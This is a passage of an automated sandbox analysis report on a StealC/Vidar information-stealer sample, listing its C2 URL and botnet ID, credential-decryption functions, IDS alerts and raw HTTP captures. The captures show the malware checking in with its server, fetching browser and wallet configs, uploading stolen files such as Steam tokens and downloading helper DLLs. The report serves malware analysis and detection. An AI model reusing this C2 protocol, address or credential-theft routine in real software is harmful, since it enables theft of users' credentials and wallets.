Instruction Fuzzy Hash: 45F09A32901A149BD725BBBD9807BEA33A0FF00725F244149F455E63D2CFB499419E9B

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Source: 0.2.file.exe.8a0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.8a0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A9B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_008A9B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008AC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_008AC820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_008A9AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_008A7240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008B8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_008B8EA0

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 31 42 35 39 42 45 43 38 31 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="hwid"81B59BEC81D32089257003------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="build"doma------HCAAEBKEGHJKEBFHJDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 31 42 35 39 42 45 43 38 31 44 33 32 30 38 39 32 35 37 30 30 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="hwid"81B59BEC81D32089257003------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="build"doma------HCAAEBKEGHJKEBFHJDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 45 42 4b 4a 44 48 44 41 46 49 45 43 42 41 4b 4b 4a 2d 2d 0d 0a Data Ascii: ------GDAEBKJDHDAFIECBAKKJContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------GDAEBKJDHDAFIECBAKKJContent-Disposition: form-data; name="message"browsers------GDAEBKJDHDAFIECBAKKJ--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGCHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 4b 4b 45 43 46 49 45 43 41 4b 45 43 41 46 42 47 43 2d 2d 0d 0a Data Ascii: ------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------FHJKKECFIECAKECAFBGCContent-Disposition: form-data; name="message"plugins------FHJKKECFIECAKECAFBGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"fplugins------EGDGIIJJECFIDHJJKKFC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFCHost: 185.215.113.37Content-Length: 7143Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDHDGCBFBKECBFHCAFHHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file"------FCAFIJJJKEGIECAKKEHI--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAAHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 2d 2d 0d 0a Data Ascii: ------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file"------EGIJKEHCAKFCAKFHDAAA--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 185.215.113.37Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="message"wallets------HCAAEBKEGHJKEBFHJDBF--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: 185.215.113.37Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="message"files------ECBAEBGHDAECBGDGCAKE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAEHDBFIDAFIDHJEBFBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 2d 2d 0d 0a Data Ascii: ------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; name="file"------BAAEHDBFIDAFIDHJEBFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="message"ybncbhylepme------ECBAEBGHDAECBGDGCAKE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBKHost: 185.215.113.37Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GIJJKFCGDGHDHIECGCBK--

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
